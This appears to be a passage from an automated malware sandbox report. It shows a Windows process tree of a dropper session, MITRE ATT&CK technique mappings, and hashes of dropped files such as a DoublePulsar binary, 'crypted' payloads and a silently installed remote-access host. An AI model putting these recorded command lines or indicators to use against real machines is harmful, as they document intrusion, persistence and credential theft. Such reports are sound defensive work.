C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffdaac3cb8,0x7fffdaac3cc8,0x7fffdaac3cd8
4⤵
PID:6052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ffffffffffbbbbb_crypted.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
3⤵
PID:1384

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffdaac3cb8,0x7fffdaac3cc8,0x7fffdaac3cd8
4⤵
PID:5324

C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
"C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe"
2⤵
PID:752

C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
"C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe"
3⤵
PID:5144

C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
4⤵
PID:5248

C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
5⤵
PID:3520

C:\Users\Admin\AppData\Local\Temp\Files\Nzewxakqtk.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Nzewxakqtk.exe"
2⤵
PID:3788

C:\Users\Admin\AppData\Local\Temp\Files\sadfbsdaf6.exe
"C:\Users\Admin\AppData\Local\Temp\Files\sadfbsdaf6.exe"
2⤵
PID:4960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 1256
3⤵
- Program crash
PID:4940

C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe"
2⤵
PID:5236

C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
2⤵
PID:5724

C:\Users\Admin\AppData\Local\Temp\2371812715.exe
C:\Users\Admin\AppData\Local\Temp\2371812715.exe
3⤵
PID:5804

C:\Users\Admin\AppData\Local\Temp\Files\FATTHER.exe
"C:\Users\Admin\AppData\Local\Temp\Files\FATTHER.exe"
2⤵
PID:3092

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4516 -ip 4516
1⤵
PID:2964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4516 -ip 4516
1⤵
PID:1120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1560 -ip 1560
1⤵
PID:1536

C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe
C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:668

C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
1⤵
PID:4636

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:124

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 7E0F4AB46552FD4C9354C73D3A282264
2⤵
PID:1760

C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
"C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
2⤵
PID:5488

C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
"C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /firewall
2⤵
PID:5520

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004D0
1⤵
PID:1896

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
PID:1524

C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
1⤵
PID:4208

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:1936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
PID:5060

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
PID:5176

C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
1⤵
PID:2220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4960 -ip 4960
1⤵
PID:4124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
PID:5508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4960 -ip 4960
1⤵
PID:5648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4960 -ip 4960
1⤵
PID:6084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4960 -ip 4960
1⤵
PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3900 -ip 3900
1⤵
PID:3516

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
PID:4912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4960 -ip 4960
1⤵
PID:4756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4960 -ip 4960
1⤵
PID:4424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4960 -ip 4960
1⤵
PID:6000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4960 -ip 4960
1⤵
PID:5196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4960 -ip 4960
1⤵
PID:540

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Assistenza Geacon\Assistenza Launcher.exe
Filesize
4KB

MD5
47159c1342a1207b688d3d7a8e859476

SHA1
f401f951325abc72ff11f099445bb2183d559877

SHA256
82d3ab6021071866bca4432b151f688b2be76234af77896225a08904ada0afd3

SHA512
bbe994c82ff0a5eadc20439c63a66f9957f4da88b810ea7588bd50ef41d68b466b01369707d19bc0f0b6068db336c3376b142051488ecf11be2b58e3d43fe3ca

Download Submit
C:\Program Files\Assistenza Geacon\Assistenza Updater.exe
Filesize
4KB

MD5
298f8e289448c912140df53e708ce404

SHA1
f8f5b521b6db4181fdb4c5680fc19255755fa4a0

SHA256
3ec38cd788adf4d175fac670c1dc32ab5102e6a91b210aec54e509c8ecab0de3

SHA512
d1b47a3ec25ddcec0c25f4f3a682547b6bb505d499169c602ee259c13904801cc9fa4fa0e47716c897e6b1c56d22fa2390316686950926a2814b5a883fe4e940

Download Submit
C:\ProgramData\Are.docx
Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\mozglue.dll
Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll
Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
ded21ddc295846e2b00e1fd766c807db

SHA1
497eb7c9c09cb2a247b4a3663ce808869872b410

SHA256
26025f86effef56caa2ee50a64e219c762944b1e50e465be3a6b454bc0ed7305

SHA512
ddfaa73032590de904bba398331fdbf188741d96a17116ada50298b42d6eb7b20d6e50b0cfae8b17e2f145997b8ebce6c8196e6f46fbe11f133d3d82ce3656db

Download Submit
C:\Users\Admin\AppData\Local\Temp\1ef93cbf
Filesize
721KB

MD5
3164ee37c0ff9133b7caab30ef73696d

SHA1
e8e8e2d0b44cc99f0b8d0ac33eac8b2b9bfb02fb

SHA256
f9140b2794cada39623256fcba1b5d4d89cf14cad7dccb3975f7919afcec1519

SHA512
737f0c8471fd47cca7305c65aae935f7bb4c9a36dfd4190be7a63db93219252541f65e8ba139884981bb74f14a23297fe674ef27c8febc91e599ab62a774dcbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
Filesize
6.0MB

MD5
c9704931d887685d96ce92d637d84045

SHA1
0875a71e9118ded121d92f3f46a3af1ec8380f8b

SHA256
0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

SHA512
3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

Download Submit
C:\Users\Admin\AppData\Local\Temp\CAKKKFBFID.exe
Filesize
106KB

MD5
fe380780b5c35bd6d54541791151c2be

SHA1
7fe3a583cf91474c733f85cebf3c857682e269e1

SHA256
b64a84d1f88e4e78464a1901c1cb5bbd5f00bb73203d719e64e072157a087b53

SHA512
ba05ba8aa13c4bc1cf98fbf6c08b021e8b19354098e0397fc8e1e5d3dcce367c1063203f24e50d0973193f6535681d0a43486e5dade5d112853b7a2fe8739b6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe
Filesize
397KB

MD5
6f593dbea0a8703af52bd66f582251a4

SHA1
2201a210e9680ec079b08bdb1da6d23112d87dcc

SHA256
a3357e7ea44e4d30304b1e5a4f53da37c848ce10fda0bd03a4f0dc0c5220e336

SHA512
97ebc0b7f27a76efead93fce05a8d059b4c6629e6348d5d4b728ed910ab00848b44737c6b5a48ac070d62a1da9273fc72b809fcf36bd17afb573fccc33d5aa73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe
Filesize
3.7MB

MD5
3b89f9f1e9932eee5a031b0266894f5f

SHA1
c77b26bf58884507389cd1c5699174eec3459df2

SHA256
757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551

SHA512
62eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\1bz7KfahvU.exe
Filesize
5.4MB

MD5
e0d2634fe2b085685f0b71e66ac91ec9

SHA1
c03d6b2218ffff1957a91f64d15ee1cbb57726fd

SHA256
24c485ecb00d9d6ed8c12fb7a3162169cb1b666ab9a90eb3c1bcdf8dd8c40df4

SHA512
48e72eccb385e282b419fe7116d6a0c7c0a6cd5ca482e57ae7b1b52440e347833d0aa9c15097bdeec8074b9a60d90843a5d4f20e4ce9d0595f3dc0a38b6fdde8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Assistenza%20Launcher.exe
Filesize
1.2MB

MD5
248a4c8d4ff1bdd7fcd16623413b9aed

SHA1
a230024285dc728759fff49e1613de6db54ce69b

SHA256
3594d1e3ac0310eb1695d18bf302b9793f19f08db917d91e4f992c2fca2d65ac

SHA512
c6ea5c5864bf8239f79d5a2e0a122ee59f62300a0b36c7cd17d47581e47306ea1bddbd3eb16a9bd4682f81feedae732c3d1c40673b7526dfd418e26a2197bc40

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Assistenza%20Updater.exe
Filesize
1.2MB

MD5
d858ad362566a6c0b91ef45f7f39bda7

SHA1
fdf721e8df1a7ee2aedab5c19b9ff58cfe9f1ca6

SHA256
0cd57b100087720729396c63549006a88781c5b8d74aa0ee9a4d580191555c8d

SHA512
31ffad256310c5951342b50e2c7c0842ed4e77f6219a9b93672e56705e3bac3ba45e6b57faeff174aa61ea9a661a5dc58407c4170aae1527c1af2a9e3f8d3b20

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\BrawlB0t.exe
Filesize
65KB

MD5
3a71554c4a1b0665bbe63c19e85b5182

SHA1
9d90887ff8b7b160ffc7b764de8ee813db880a89

SHA256
9340551164eb763cd63db1f251b535dea497edfcf1eb46febcb642b1369f8595

SHA512
49c869db9a74c8054a477396c205685f41d4fe79ed1bb9088c1d528d7df8dfd1e251ec016939a0207484e6fd2f3338afad06b4f242c7fcb5d16d2293db16e772

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe
Filesize
44KB

MD5
c24315b0585b852110977dacafe6c8c1

SHA1
be855cd1bfc1e1446a3390c693f29e2a3007c04e

SHA256
15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13

SHA512
81032d741767e868ec9d01e827b1c974b7c040ff832907d0a2c4bdc08301189b1de3338225587eddf81a829103392f454ba9d9685330b5f6706ea2977a6418e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\FATTHER.exe
Filesize
297KB

MD5
597fc72a02489d489b93530de2c30bb1

SHA1
6bfe1f53affe68aa157c314cb77e055ffd982e92

SHA256
3c2b9fe3c1738e99588a5abf9373ce717aceaa02ef1895d55e998770af8d3e98

SHA512
92a209617d8479201869faa2d19dca8253b6d7b3db23fb253c192d8ea05203e97e3449fe452896120a6790c04ee37c3d024a8d6a1ae979f848ff533b293a45b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ISetup2.exe
Filesize
413KB

MD5
0519b278b624bc86376278205355d163

SHA1
d29bf131b735cbfa4a4cc0184e013a12c90cea80

SHA256
96fce38b0770ed265a22ba22258c9f81c0cd24d990f924a3891b0561dc53fb34

SHA512
284b76dd7e9512baf02acefe6eca92e11ca1a6f15769c9132f1a0ed582173eb599cc02dfe4a79e48063d338a2303cb53085f4908426b5c3527279591c5f6cc56

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe
Filesize
214KB

MD5
70bd663276c9498dca435d8e8daa8729

SHA1
9350c1c65d8584ad39b04f6f50154dd8c476c5b4

SHA256
909984d4f2202d99d247b645c2089b014a835d5fe138ccd868a7fc87000d5ba1

SHA512
03323ffe850955b46563d735a97f926fdf435afc00ddf8475d7ab277a92e9276ab0b5e82c38d5633d6e9958b147c188348e93aa55fb4f10c6a6725b49234f47f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe
Filesize
817KB

MD5
9e870f801dd759298a34be67b104d930

SHA1
c770dab38fce750094a42b1d26311fe135e961ba

SHA256
6f1f83697d8caf1ac3cf0c3b05913633d49e756ed17189efc32cb0a6c3820e6b

SHA512
f0719d751e71229369ba9c49eee649e130f8eed7e7b662c724f8e7b25a950d77d4ba69aa967394d007561383ca64b95bcb0f466dfc7e1d4e00bf9e3829c957bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Nvokcuobkn.exe
Filesize
51KB

MD5
8647ffb0d889ea1933f7a4e7771094c0

SHA1
5c20b6cf56287c18566e50b0249e6cd9285f3ca3

SHA256
6570e239d47518afaf8baeed1da31b475ec07ee1256e85bd0318d397f40d4e5c

SHA512
26c47cf2ceb3a6e7d3d3b7f7d8934d6d769d31d9d279479a141df6ae2057e8b2644e12a225f56e5306529133e1a793b9500e5633732ef586464ea2c8fd43957c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Nzewxakqtk.exe
Filesize
51KB

MD5
b4bb2848a06f5b7cc4164ac2a701f50a

SHA1
9ad29b0652b419df2840526002f2c9ae483c0f48

SHA256
fb9844ab20cb5995d2fb6df467f1aee283ca0a013b8f330ad39a9ed5e3c7c026

SHA512
9dcec4f9a6a299010abef9557fd7c19e9410ded76dae915136dbb2365787d88fd7c1e712d475d9f6136d1244b9e867c50e767e10d7d4891ea817bf09241d67ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Pac-Man.exe
Filesize
5.7MB

MD5
8951c19af1a1bc8423823007abdf9ade

SHA1
86aec431d6bba08dbc76e236ca490a7ad3f0ded9

SHA256
420b23eea40a6a4bf0f1cdfffe85d1e6ca59da357268c0373c8d30d1b5c99fa3

SHA512
459a37abe6b364b81111b177c655e02446cc66f7667a772f7340f54151d3a783a3dce0fa8e61658c265773f93ea3615b55384e952134f04427878c2b5762d262

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe
Filesize
311KB

MD5
ed7cf64192cd90aac14b69cdd202f30d

SHA1
eb1e1a8d336631f7be51e4189bcf251ee71bf60a

SHA256
8f5d2c5facf4702e4a6338b5224d9526d4761535901acf27f43992024340ccb0

SHA512
8d320b1f8bc051537f9e63cad2b3af5111f7d30b24cd38633b2a2ea84f81cd7c70fd85074222f61ffd4a1f02509df9428ee805534e175f581291f12a0275612c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Qmpjm.exe
Filesize
837KB

MD5
7bbc4afa6e27835feccb28fd07eaa31f

SHA1
35c32bcae2f8ecbeadb8d22cf70e254e3e4f9cfa

SHA256
f4e48226bd49807f79d3c59fa37338c9aee446298a44831111465cf4de3e6abb

SHA512
d56f68bd7132c8ef52613817077cb786a9e7e67f98c26497e8926a9403199d9deccdd7af52eb3b63106a55312c77f7c2ba6655be26e6440bad1e3c87acb05267

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\RMS.exe
Filesize
8.3MB

MD5
73f351beae5c881fafe36f42cde9a47c

SHA1
dc1425cfd5569bd59f5d56432df875b59da9300b

SHA256
a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824

SHA512
f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\cmon.exe
Filesize
2.7MB

MD5
2bae8753475af921d7258f9b1e9fccd4

SHA1
0da0ad8fbea157d468e4ccbf66575808103246f7

SHA256
9df4aaa956d54f55f1bb038f3e8f086169983e094ef8432cd71df928a888a2d0

SHA512
0a346f1dc1771f4e049d04eda7bfc021120cf3797011f89b3a6e2b5ad2fb6bb88d6218d8c6383d8a98bc9eaef2797a01632e7a2526005b04a5000c2889cdd12d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\config.json
Filesize
3KB

MD5
74fb175e205d74c162df04f8236ec94b

SHA1
57ccfe00ef11556ffa576c74eeecf3730659ae89

SHA256
1fb2afa760aeaee7a0201e34a6ff5071d5755312d14132e8956e840eaae78dc9

SHA512
8b7ab1c082a965b921f3a56a75e2190365e5b7f1519b4d8da9c78cded313ed151ed8967e9b0599077c284ea4127e0471ecdc936dd96ca624d5a9f5707ce54830

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe
Filesize
315KB

MD5
73c4afd44c891cd8c5c6471f1c08cbfb

SHA1
3372f8ae05574924144cb9671fc455f6d7fc19e7

SHA256
eb9218ab72b011d8d5075fedeaaed45b3e6889ee5d31b53b617ce6951752f132

SHA512
fe8e07cf2b039ef421a24672435ce4dad506f2317355881b3484fa7bae61856428a54781632cc5bb0615dd07d9fa07d0ce20514dc611f863b55af89b8e77c822

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ffffffffffbbbbb_crypted.exe
Filesize
677KB

MD5
5a2a3883dbb564b4ae87d05707d4cd5d

SHA1
b277cc5fd2358ba865e011fe9d8c2f89c40a0649

SHA256
939bd5097a5a1c3d3ecae7d6f90194e47a6d20fa0e7c21d68679be9ea5c65f2f

SHA512
6445528d36370335ee6d9ef7a8424e970e49730689d576755e23c83d603bbf6a09e2a1ebceee42149c0d16424a7256525cff478d5b352241ce65a4b0950c88aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\first.exe
Filesize
66KB

MD5
8063f5bf899b386530ad3399f0c5f2a1

SHA1
901454bb522a8076399eac5ea8c0573ff25dd8b8

SHA256
12aa47db9b5a1c6fddc382e09046d0f48fbdce4b0736b1d5cfcf6f1018fdd621

SHA512
c9e4e9e5efb7e5def5ae35047e4a6b6a80174eade2a2d64137f00e20d14e348c5852f9c1bac24d5dee4a6d43049b51517f677d504fbb9a413704eb9985f44f9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
Filesize
5.3MB

MD5
de08b70c1b36bce2c90a34b9e5e61f09

SHA1
1628635f073c61ad744d406a16d46dfac871c9c2

SHA256
432747c04ab478a654328867d7ca806b52fedf1572c74712fa8b7c0edb71df67

SHA512
18a30e480ce7d122cfad5a99570042e3bef9e1f9feda1f7be32b273a7248274285c65ac997c90d3d6a950a37b4ea62e6b928bfefc924187c90e32ea571bfd1f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe
Filesize
769KB

MD5
c6fea3621cca858371f2d596c9723891

SHA1
48a23b6c768a4a4f8ba2864159f959c0e025f08a

SHA256
0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3

SHA512
c3c7973b774c9cbe0888ebf4858b617a4431cb614a38d260ebefa3717ee932ccb0e93a14159aa6856aa0094e13627a1c8a071fdfff3639f5b14194af3a3d1bf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\hack1226.exe
Filesize
63KB

MD5
d259a1c0c84bbeefb84d11146bd0ebe5

SHA1
feaceced744a743145af4709c0fccf08ed0130a0

SHA256
8de12184a006d3340241492baca0ba1034182b08d3c6a0f09c0af99d539bd48b

SHA512
84944d132fb47be7d22e55456bc1c4bbb93ce281b775e57641a012602f77219c6a9c75ed67ca1fbec1ee15550dee58b9a8adeacbe136e58d2ed1f4c6b755fd54

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
Filesize
12.0MB

MD5
b7796f62789b21cc93452ed1b107f1f5

SHA1
461f2de0f5168c8083d514c29611d3fbf9e3d646

SHA256
fb271ea3bab8547869fec815396c389ace130cc6d8942d7098b9a6a9a3826a8f

SHA512
2dc33fc12c805cc05309717ab1377114cf746ae17a86710eb7a038ebe10d16c9765977e889363c7b2bd997bdc313ac4d9dc186a018e91e11c5139b63a8576308

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\mk.exe
Filesize
297KB

MD5
cc1e287519f78a28dab6bde8e1093829

SHA1
9262753386caa4054aa845d918364e964e5505aa

SHA256
dbcb61ce94c4d2d216de2b503937a2a964b984577f2d7730b7c6428b2b5e8db2

SHA512
527b6d905e2ca829369563baa7be9eaf4050ef9bbf438ccc98b9b821e76977aaebbda8471da8b81c0542395c5fc316b19d7034155f278640d0765bfc55dc1f43

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\poolsdnkjfdbndklsnfgb.exe
Filesize
19.3MB

MD5
e29a0e59ee8a40469e3bedfe2612f567

SHA1
2254d7b5bf1524bb1a224875abba9110f7a815f2

SHA256
118088ebdecef31805885de379e8332d7551078d4f3c6c15db52a70b108cbd76

SHA512
9908d67e32bcbd3f2f29c60ca208bfcaf76252e2f63712d1c625e9a36ac378192977ba6f05cbbfb33baa4db7ae4c1686d36dcfa7363b1dbc571ca3ccbef066df

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\sadfbsdaf6.exe
Filesize
420KB

MD5
7b432411c12d3d0d31ecaf9011450e42

SHA1
968943d42ba1e8938989b6ed1884195c2285396f

SHA256
3fa8f8c64210e0949184380e438a86e4d8e597c7b63cd8591232083b97fa5348

SHA512
6881c00ec9674a90b6390e18bcff67d0a5c837411f83955869a9cb2b62bccdedbc93561e70f6ddab7baaf908c8154de3a5bb982d0ee9ecc62363cc67d9cf563b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\socks5-clean.exe
Filesize
268KB

MD5
21eaa1da67a8d9f3b76b4a63a1da1442

SHA1
677a156ca20cabf46fce1085e8743344ce075e9f

SHA256
76d658bfc9ccc2e74cd4e4ef834506828072c49db03cac869f3b7d4146391335

SHA512
f031d2746248b956246f2addc433160f1e677bb313e27eba33c6f0f3bccb7c2d7a2a0f9ef6e5474f867a57067c1ae06767e2fd9dd575618397cfc0997a2f43d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\sys.exe
Filesize
1.0MB

MD5
a4702dad93dc851947aa6bd7b9652c46

SHA1
99f23b3077fa0f57c3c0cb95341adf38fdeb6142

SHA256
2cd378dd3e9c3ddb6196c7c8a9dc1c88ecf74b2371f1394bd01ff37857a8c7d5

SHA512
9a436fd6a9a9fd447dee0a61fc485a5369db0349faefac2e5071295a31941c39db3a39529672213178f79f391df0e6fb64e73cee70641e5ab8e8a6d322f8da80

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
Filesize
6KB

MD5
cfb7fbf1d4b077a0e74ed6e9aab650a8

SHA1
a91cfbcc9e67e8f4891dde04e7d003fc63b7d977

SHA256
d93add71a451ec7c04c99185ae669e59fb866eb38f463e9425044981ed1bcae0

SHA512
b174d0fed1c605decc4e32079a76fbb324088b710ce1a3fe427a9a30c7bdcd6ac1ad223970cdc64061705f9a268afa96463ee73536b46991981d041517b77785

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\yoffens_crypted_EASY.exe
Filesize
832KB

MD5
e3c0b0533534c6517afc94790d7b760c

SHA1
4de96db92debb740d007422089bed0bcddf0e974

SHA256
198edf9613054f8a569ac804bf23081fbfa8566270fff05bba9dc3c9a32d9952

SHA512
d12631796afca877c710b9308d1236fca1bfe3abe6582445d9df1bbb404160cff220316e3f600b3a87b46dd3bfb859734008b5c668e410466e82be9dc033249e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6284.tmp
Filesize
1KB

MD5
